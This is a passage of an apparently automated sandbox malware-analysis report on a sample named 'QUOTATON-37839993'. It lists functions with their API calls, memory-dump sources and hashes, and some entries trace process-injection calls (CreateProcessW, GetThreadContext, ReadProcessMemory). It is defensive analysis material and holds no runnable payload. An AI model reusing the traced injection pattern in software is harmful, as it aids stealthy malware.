                                                                      • Instruction Fuzzy Hash: EFF09632802A249ADB10BB65BE027AD66E06F41374F24B258E424BB1C5CFFC49415B51
                                                                      Function 0104EB35 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0104F2F3
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0104F389
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0104F3AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                      • Instruction ID: 5e6e5735bf891754d4d1010a0c4587705beadcde124f2cedeef484df515507bd
                                                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                      • Instruction Fuzzy Hash: D212DE24E18658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                                      Function 00E20C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 73677cdd7ad84c02983c7ff88aed462ee8c583043274a97e7ba895fd345cf3ba
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 703106B0A001159FC718DF08E486969F7A6FF49314B2497A5E80AEB392DB31EDC1DBC0
                                                                      Function 00E3FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: a8b81aa0b7f91eabb3c66a9dd8973723ff1be4968701871ea2436df289a75f30
                                                                      • Instruction ID: 20778dccc8d37b17447316a3ee74fbbc438c4e8fabf5c8046827a8993adfed5d
                                                                      • Opcode Fuzzy Hash: a8b81aa0b7f91eabb3c66a9dd8973723ff1be4968701871ea2436df289a75f30
                                                                      • Instruction Fuzzy Hash: 2D411A745043519FDB14DF14C488B1ABBE1BF45318F0998ACE999AB3A2C731EC85CF52
                                                                      Function 00E07B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 510767285f01f67e0c968dd9e184407f69ed7eb2e8f7c6e1e6b906d155b48b4f
                                                                      • Instruction ID: 62a9a81a813f1ef3693ab604ddd2492c4eb24618702b100b523bf2f0cc64a6b9
                                                                      • Opcode Fuzzy Hash: 510767285f01f67e0c968dd9e184407f69ed7eb2e8f7c6e1e6b906d155b48b4f
                                                                      • Instruction Fuzzy Hash: EE210272A04A19EBDB148F12E8457AEBFF4FB14350F21A529E986E52E0EB3090D0DB41
                                                                      Function 00E04DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E04BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00E04BEF
                                                                        • Part of subcall function 00E2525B: __wfsopen.LIBCMT ref: 00E25266
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04E0F
                                                                        • Part of subcall function 00E04B6A: FreeLibrary.KERNEL32(00000000), ref: 00E04BA4
                                                                        • Part of subcall function 00E04C70: _memmove.LIBCMT ref: 00E04CBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                      • String ID:
                                                                      • API String ID: 1396898556-0
                                                                      • Opcode ID: 08d6b892e94521415c6e540abbbeb010e8affe4ca5b60be66ba51a1a13d2bdf3
                                                                      • Instruction ID: 4f2eff90e4d59fe1d69c40429d5a2b73e4ea16f5d5574971b99b15b884cc4d5c
                                                                      • Opcode Fuzzy Hash: 08d6b892e94521415c6e540abbbeb010e8affe4ca5b60be66ba51a1a13d2bdf3
                                                                      • Instruction Fuzzy Hash: C711E3B264020AABCF15BF70DE16FAD77E8EF84710F109829F641BB1C1EA719A419B50
                                                                      Function 00E3FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 7e7b137bc14b94c0c2f6fa6e84c2b300a334605767cc99dc3d710db70f2c780d
                                                                      • Instruction ID: db1a059bdc170d668b9006c5e77906d26d605ade9c4148bbcf8a1a5408a49dfe
                                                                      • Opcode Fuzzy Hash: 7e7b137bc14b94c0c2f6fa6e84c2b300a334605767cc99dc3d710db70f2c780d
                                                                      • Instruction Fuzzy Hash: 9F215A74508301DFDB14DF14C844A5ABBE0BF88318F09986CF98967762C731E844CB52
                                                                      Function 00E2072A Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cdba1a02a84a936c51082150c65d0ab6fd7c3ce4248e23738481275dedc76eb4
                                                                      • Instruction ID: fd7d36b28907032ecea3d0c9c58a0db04dd04b64f25a2e1ec517c3172eb9062b
                                                                      • Opcode Fuzzy Hash: cdba1a02a84a936c51082150c65d0ab6fd7c3ce4248e23738481275dedc76eb4
                                                                      • Instruction Fuzzy Hash: 65012832444125DFE7216A54BC82AFAB7EDEFC1321F20807BFC48E68A1D6709C85CAD1
                                                                      Function 00E08248 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(00000000,?,00000000,00000048,-00000003,?,00E13E69,?,?,?,-00000003,00000000,00000000), ref: 00E08280
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID:
                                                                      • API String ID: 3964851224-0
                                                                      • Opcode ID: 4d8a9642d8998f8091a41753da9d9cc4aeea931c85218432df8f28c612c367a9
                                                                      • Instruction ID: d0493d8ae1aa5aa9b9e078e7cc246ab806d04a279b4cbf912094a7b814855f06
                                                                      • Opcode Fuzzy Hash: 4d8a9642d8998f8091a41753da9d9cc4aeea931c85218432df8f28c612c367a9
                                                                      • Instruction Fuzzy Hash: B1F0F675605E32DBC7116B55D60062AFBA4FF44F60F005129F58A666E1CF71E860CBC4
                                                                      Function 00E24863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __lock_file.LIBCMT ref: 00E248A6
                                                                        • Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd_noexit__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2597487223-0
                                                                      • Opcode ID: 0e15f081f023f291e3061e58f81f02dc2d85f5db84d92e2e34fff44a233e536e
                                                                      • Instruction ID: c05d31dedbdf3222fb5f527579047154d2334e3a51d02309af579500bc7072c3
                                                                      • Opcode Fuzzy Hash: 0e15f081f023f291e3061e58f81f02dc2d85f5db84d92e2e34fff44a233e536e
                                                                      • Instruction Fuzzy Hash: 4EF022B1911228EBDF19AFB0AC063EE36E0BF01324F04A404F424BA2C2DBB88950DB41
                                                                      Function 00E04E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04E7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 5c6f1bae75497d70681d192ac505f074b760d5b9bb07e50435a9c67a64ae2301
                                                                      • Instruction ID: 980f7235beef8a9cf4742d7b3c6186970bd1c6516b1b4a0939778594f8b02691
                                                                      • Opcode Fuzzy Hash: 5c6f1bae75497d70681d192ac505f074b760d5b9bb07e50435a9c67a64ae2301
                                                                      • Instruction Fuzzy Hash: 31F065F1501712CFCB349F64E594852B7F1BF14369320993EE2D7A6690C7319885DF40
                                                                      Function 00E20791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E207B0
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_memmove
                                                                      • String ID:
                                                                      • API String ID: 2514874351-0
                                                                      • Opcode ID: 1b80624a344d429f7886f8289f24ce983c718795781da4ea96f077af40eeee06
                                                                      • Instruction ID: 1d57e37be0d26ae5da5a28b978564cb32bfc84548389c4a540ee7741be1218f0
                                                                      • Opcode Fuzzy Hash: 1b80624a344d429f7886f8289f24ce983c718795781da4ea96f077af40eeee06
                                                                      • Instruction Fuzzy Hash: 65E0CD369041285BC720D6599C05FEA77DDDFC87A0F0541F5FC0CE7254DD60AC8086D0
                                                                      Function 00E2525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __wfsopen
                                                                      • String ID:
                                                                      • API String ID: 197181222-0
                                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                      • Instruction ID: a36b2be3ec9fe9a0b4ed2e102b7981a8cfb5a51a3a4957ef66d120c007cbb6a6
                                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                      • Instruction Fuzzy Hash: 23B0927744020CB7CE012A82FC02A593B699B41764F408020FB0C281B2A673A6649A89
                                                                      Function 0104FB34 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 0104FB49
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction ID: 86cd7f95f29b9441899c67b72e25cdbcda31f1b8999cae92e5cf5ac5e5179438
                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction Fuzzy Hash: D4E0BF7494020EEFDB00DFA8D5496DE7BB4EF04301F1005A1FD05D7680DB309E54CA66
                                                                      Function 0104FB38 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 0104FB49
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: 4830c8671998410559b07850baf1b2e0317952bd8f39c7c78125f3982b78c376
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: B0E0E67494020EDFDB00DFB8D5496DE7BB4EF04301F100161FD01D2280D6309D50CA62

                                                                      Non-executed Functions

                                                                      Function 00E8CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E8CB37
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8CB95
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E8CBD6
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E8CC00
                                                                      • SendMessageW.USER32 ref: 00E8CC29
                                                                      • _wcsncpy.LIBCMT ref: 00E8CC95
                                                                      • GetKeyState.USER32(00000011), ref: 00E8CCB6
                                                                      • GetKeyState.USER32(00000009), ref: 00E8CCC3
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8CCD9
                                                                      • GetKeyState.USER32(00000010), ref: 00E8CCE3
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E8CD0C
                                                                      • SendMessageW.USER32 ref: 00E8CD33
                                                                      • SendMessageW.USER32(?,00001030,?,00E8B348), ref: 00E8CE37
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E8CE4D
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E8CE60
                                                                      • SetCapture.USER32(?), ref: 00E8CE69
                                                                      • ClientToScreen.USER32(?,?), ref: 00E8CECE
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E8CEDB
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E8CEF5
                                                                      • ReleaseCapture.USER32 ref: 00E8CF00
                                                                      • GetCursorPos.USER32(?), ref: 00E8CF3A
                                                                      • ScreenToClient.USER32(?,?), ref: 00E8CF47
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E8CFA3
                                                                      • SendMessageW.USER32 ref: 00E8CFD1
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E8D00E
                                                                      • SendMessageW.USER32 ref: 00E8D03D
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E8D05E
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E8D06D
                                                                      • GetCursorPos.USER32(?), ref: 00E8D08D
                                                                      • ScreenToClient.USER32(?,?), ref: 00E8D09A
                                                                      • GetParent.USER32(?), ref: 00E8D0BA
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E8D123
                                                                      • SendMessageW.USER32 ref: 00E8D154
                                                                      • ClientToScreen.USER32(?,?), ref: 00E8D1B2
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E8D1E2
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E8D20C
                                                                      • SendMessageW.USER32 ref: 00E8D22F
                                                                      • ClientToScreen.USER32(?,?), ref: 00E8D281
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E8D2B5
                                                                        • Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E8D351
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                      • String ID: @GUI_DRAGID$F$pb
                                                                      • API String ID: 3977979337-96320988
                                                                      • Opcode ID: c3cb04bf74e325a07b5cd1ec69bf0cc19d5b111aa3010e5b3f85dcbf9d002ed2
                                                                      • Instruction ID: 2d87dc60d2a6efa971fde584f257444e9b98c4e85885e6aca41c8a790c761ca9
                                                                      • Opcode Fuzzy Hash: c3cb04bf74e325a07b5cd1ec69bf0cc19d5b111aa3010e5b3f85dcbf9d002ed2
                                                                      • Instruction Fuzzy Hash: 2042DE75204640AFC724EF25CC48EAABBE5FF49314F241A29F55DA72B0C731E884DBA1
                                                                      Function 00E16F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_memset
                                                                      • String ID: ]$3c$DEFINE$P\$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
                                                                      • API String ID: 1357608183-1767882695
                                                                      • Opcode ID: 9a3f9842fcb9a43092ef69f3882388bc25b3c4d68b3daabe09d728b701a9538f
                                                                      • Instruction ID: e1fbcf9b3574e49614b32ce47e45b54c97df66737a5eeb5fde4235c3d99795a0
                                                                      • Opcode Fuzzy Hash: 9a3f9842fcb9a43092ef69f3882388bc25b3c4d68b3daabe09d728b701a9538f
                                                                      • Instruction Fuzzy Hash: 4293CF71A00219DBDB24CFA8C881BEDB7B1FF48715F24956AED45BB280E7709E85CB40
                                                                      Function 00E048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(00000000,?), ref: 00E048DF
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E3D665
                                                                      • IsIconic.USER32(?), ref: 00E3D66E
                                                                      • ShowWindow.USER32(?,00000009), ref: 00E3D67B
                                                                      • SetForegroundWindow.USER32(?), ref: 00E3D685
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E3D69B
